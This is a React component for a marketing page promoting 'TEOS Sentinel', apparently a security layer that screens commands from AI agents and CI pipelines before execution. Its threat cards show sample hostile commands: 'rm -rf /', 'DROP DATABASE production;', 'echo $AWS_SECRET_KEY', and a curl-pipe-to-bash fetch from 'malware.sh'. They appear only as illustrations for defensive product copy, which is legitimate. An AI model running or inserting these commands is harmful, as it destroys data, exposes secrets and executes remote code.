'use client';

import { useEffect, useState } from 'react';

const FADE = 'transition-all duration-500';

const THREATS = [
  { icon: '\u{1F6D1}', title: 'Destructive Shell Commands', desc: 'Wiper-pattern commands generated by AI agents pass through pipelines undetected.', code: 'rm -rf /' },
  { icon: '\u{1F6D1}', title: 'Database Destruction', desc: 'DROP and TRUNCATE commands from LLMs execute without enforcement.', code: 'DROP DATABASE production;' },
  { icon: '\u{1F6D1}', title: 'Secret Exposure', desc: 'API keys and environment variables leak through AI-generated code and CI logs.', code: 'echo $AWS_SECRET_KEY' },
  { icon: '\u26A0\uFE0F', title: 'Dangerous CI Scripts', desc: 'curl|bash chains, write-all permissions, and privileged containers in AI-generated pipelines.', code: 'curl https://malware.sh | bash' },
];

function useInView(threshold = 0.1) {
  const [ref, setRef] = useState<HTMLElement | null>(null);
  const [visible, setVisible] = useState(false);

  useEffect(() => {
    if (!ref) return;
    const obs = new IntersectionObserver(([e]) => { if (e.isIntersecting) setVisible(true); }, { threshold });
    obs.observe(ref);
    return () => obs.disconnect();
  }, [ref, threshold]);

  return { setRef, visible };
}

export default function WhyNowAndGap() {
  const section = useInView();
  const gap = useInView(0.2);

  return (
    <>
      {/* WHY NOW */}
      <section id="why-now" className="py-20 md:py-24 border-b border-[rgba(255,255,255,0.07)] bg-gradient-to-b from-transparent via-red/[0.03] to-transparent relative z-[1]" ref={section.setRef}>
        <div className="max-w-[1100px] mx-auto px-6 lg:px-8">
          <div className={FADE}>
            <p className="font-mono text-[11px] tracking-[0.12em] uppercase text-red mb-4">Why Now</p>
            <h2 className="text-[clamp(26px,3.5vw,44px)] font-[800] tracking-[-0.03em] leading-[1.1] mb-5">
              AI agents now execute.<br />Nothing protects it.
            </h2>
            <p className="text-[16px] text-muted max-w-[520px] leading-[1.6] mb-12">
              AI agents execute commands, modify infrastructure, access secrets, and deploy systems autonomously. Existing tools evaluate too late. Sentinel blocks before execution.
            </p>
          </div>

          <div className={`grid grid-cols-1 md:grid-cols-2 gap-px border border-[rgba(255,255,255,0.12)] rounded-sm overflow-hidden ${section.visible ? 'opacity-100 translate-y-0' : 'opacity-0 translate-y-4'} transition-all duration-600`}>
            {THREATS.map((t, i) => (
              <div key={i} className="bg-surface p-6 md:p-7">
                <div className="text-xl mb-3" aria-hidden="true">{t.icon}</div>
                <h4 className="text-[14px] font-[700] mb-2 tracking-[-0.01em]">{t.title}</h4>
                <p className="font-mono text-[12px] text-muted leading-[1.7] mb-2.5">{t.desc}</p>
                <code className="block bg-red/[0.08] border border-red/20 px-3 py-2 rounded-sm text-[12px] text-red tracking-[0.02em] font-mono">
                  {t.code}
                </code>
              </div>
            ))}
          </div>

          {/* AI Execution Gap */}
          <div ref={gap.setRef} className={`mt-12 p-8 md:p-10 border border-red/25 rounded-sm bg-red/[0.06] flex flex-col md:flex-row items-start gap-6 md:gap-7 ${gap.visible ? 'opacity-100 translate-y-0' : 'opacity-0 translate-y-4'} transition-all duration-500`}>
            <div className="text-3xl md:text-4xl flex-shrink-0" aria-hidden="true">\u26A1</div>
            <div>
              <p className="font-mono text-[10px] tracking-[0.14em] uppercase text-red mb-2">The Core Problem</p>
              <h3 className="text-[20px] md:text-[22px] font-[800] mb-2.5">The AI Execution Gap</h3>
              <div className="flex flex-col gap-1.5 max-w-[560px]">
                <p className="text-[15px] text-muted leading-[1.6]">
                  No security layer exists between AI code generation and real-world execution.
                </p>
                <ul className="font-mono text-[13px] text-muted leading-[1.8] list-disc list-inside space-y-0.5 ml-1">
                  <li>AI agents execute commands without pre-execution enforcement</li>
                  <li>CI/CD pipelines run generated scripts unverified</li>
                  <li>One bad prompt can destroy production infrastructure</li>
                </ul>
                <p className="text-[15px] text-white font-[700] leading-[1.6] mt-1">
                  Sentinel closes the gap deterministically.
                </p>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* SOLUTION */}
      <section className="py-20 md:py-24 border-b border-[rgba(255,255,255,0.07)] relative z-[1]" ref={section.setRef}>
        <div className="max-w-[1100px] mx-auto px-6 lg:px-8">
          <div className={FADE}>
            <p className="font-mono text-[11px] tracking-[0.12em] uppercase text-red mb-4">The Infrastructure Layer</p>
            <h2 className="text-[clamp(26px,3.5vw,44px)] font-[800] tracking-[-0.03em] leading-[1.1] mb-5">
              Sentinel sits between<br />generation and execution.
            </h2>
            <p className="text-[16px] text-muted max-w-[520px] leading-[1.6] mb-14">
              Intercepts every command before it reaches production. Enforces policy deterministically. Returns structured verdicts your agent can act on immediately.
            </p>
          </div>

          {/* Layer diagram */}
          <div className={`flex flex-col gap-0.5 max-w-[680px] mb-14 ${section.visible ? 'opacity-100 translate-y-0' : 'opacity-0 translate-y-4'} transition-all duration-600`}>
            <div className="flex items-center gap-4">
              <div className="flex-1 bg-surface2 border border-[rgba(255,255,255,0.12)] rounded-sm px-6 py-[18px] font-mono text-[13px] font-[700] tracking-[0.04em] text-muted">
                📐 AI Agent / Developer / CI Pipeline
              </div>
              <span className="font-mono text-[11px] text-muted text-right whitespace-nowrap min-w-[100px] md:min-w-[140px]">\u2191 generates</span>
            </div>
            <div className="font-mono text-[18px] text-muted text-center py-1" aria-hidden="true">\u2193</div>
            <div className="flex items-center gap-4">
              <div className="flex-1 bg-red/[0.10] border-2 border-red/50 rounded-sm px-7 py-6 font-mono text-[14px] md:text-[15px] font-[700] tracking-[0.04em] text-white relative">
                𓂀 TEOS Sentinel \u2014 Risk Engine
                <span className="absolute right-4 md:right-5 top-1/2 -translate-y-1/2 font-mono text-[10px] text-red tracking-[0.1em] hidden sm:block">
                  SECURITY LAYER
                </span>
              </div>
            </div>
            <div className="font-mono text-[18px] text-muted text-center py-1" aria-hidden="true">\u2193</div>
            <div className="flex items-center gap-4">
              <div className="flex-1 bg-surface2 border border-[rgba(255,255,255,0.12)] rounded-sm px-6 py-[18px] font-mono text-[13px] font-[700] tracking-[0.04em] text-muted">
                🏭 Production · Databases · Infrastructure
              </div>
              <span className="font-mono text-[11px] text-muted text-right whitespace-nowrap min-w-[100px] md:min-w-[140px]">\u2193 only approved</span>
            </div>
          </div>

          {/* Quote */}
          <div className={`p-7 md:p-8 border-l-[3px] border-red bg-surface ${section.visible ? 'opacity-100 translate-x-0' : 'opacity-0 -translate-x-3'} transition-all duration-500 delay-200`}>
            <p className="text-[18px] md:text-[20px] font-[700] leading-[1.4] tracking-[-0.02em] mb-2">
              Nothing runs until Sentinel approves it.
            </p>
            <span className="font-mono text-[12px] text-muted">
              Runtime security middleware \u00B7 Deterministic enforcement \u00B7 Compliance audit trail
            </span>
          </div>
        </div>
      </section>
    </>
  );
}
